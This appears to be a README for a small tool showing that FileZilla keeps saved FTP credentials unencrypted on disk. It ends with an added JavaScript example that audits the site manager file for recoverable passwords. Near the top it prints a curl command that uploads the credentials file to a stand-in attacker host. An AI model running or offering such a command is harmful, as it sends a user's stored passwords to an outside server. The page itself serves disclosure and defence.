Filezilla passwords revealer
This is a small script to demonstrate that the FileZilla credentials are stored unencrypted on the local drive and that any program, malware, or even Node module running on your machine can trivially access them.
A single bash command is enough!

    curl -F "credentials=@~/.filezilla/sitemanager.xml" attacker.com/credentials.php

This command reads the local preference file and uploads it to a remote website.
This script should work with Windows, Linux and Mac. Please open an issue otherwise.
- Clone this repository
Or simply copy-paste this script into your terminal:

    git clone https://github.com/christophetd/filezilla-passwords-revealer.git
    cd filezilla-passwords-revealer
    npm install
    node index.js

Disclaimer: copy-pasting bash commands into your terminal is a terrible practice security-wise.
- « Making FileZilla FTP Client's passwords more secure with TrueCrypt ». Note that you should use VeraCrypt instead of TrueCrypt since the latter is now deprecated.
- Some of the numerous feature requests on the official bug tracker: #5530, #2935, #3176
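
To check your own machine for the exposure described above, the following added example (not part of this repository's code) lists which saved sites keep a recoverable password, without ever returning the password itself. It assumes the FileZilla 3 element names `Server`, `Host`, `User`, `Pass` and `Name`, which the page does not show; the sample XML and the function names are constructed for illustration.

```javascript
// Added example: audit a FileZilla site manager file without exposing any password.
// Element names (Server, Host, User, Pass, Name) are assumed from the FileZilla 3 layout.

// Constructed sample input; hosts, users and passwords are made up.
const SAMPLE_XML = `<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <Servers>
    <Server><Host>ftp.example.org</Host><User>alice</User><Pass>hunter2</Pass><Name>legacy</Name></Server>
    <Server><Host>files.example.net</Host><User>bob</User><Pass encoding="base64">czNjcjN0</Pass><Name>staging</Name></Server>
    <Server><Host>sftp.example.com</Host><User>carol</User><Name>ask-each-time</Name></Server>
  </Servers>
</FileZilla3>`;

// Text of the first <tag>...</tag> inside an XML fragment, or null if absent.
function field(fragment, tag) {
  const m = fragment.match(new RegExp(`<${tag}(?:\\s[^>]*)?>([\\s\\S]*?)</${tag}>`));
  return m ? m[1].trim() : null;
}

// Classify how each saved site stores its password. The value is never returned.
// base64 is an encoding, not encryption, so it counts as recoverable.
function auditSiteManager(xml) {
  const findings = [];
  for (const [, body] of xml.matchAll(/<Server\b[^>]*>([\s\S]*?)<\/Server>/g)) {
    const pass = body.match(/<Pass(\s[^>]*)?>([\s\S]*?)<\/Pass>/);
    let storage = "none";
    if (pass && pass[2].trim() !== "") {
      const enc = /encoding="([^"]*)"/.exec(pass[1] || "");
      storage = enc ? enc[1] : "plaintext";
    }
    findings.push({
      site: field(body, "Name") || field(body, "Host"),
      user: field(body, "User"),
      storage,
      recoverable: storage === "plaintext" || storage === "base64",
    });
  }
  return findings;
}

// Audit a real file; the caller supplies the path to its own sitemanager.xml.
function auditFile(path) {
  return auditSiteManager(require("fs").readFileSync(path, "utf8"));
}

console.log(auditSiteManager(SAMPLE_XML));
```

Any entry reported as `recoverable` is a candidate for removing the saved password from the site manager or moving the file into an encrypted volume, as the first link above suggests.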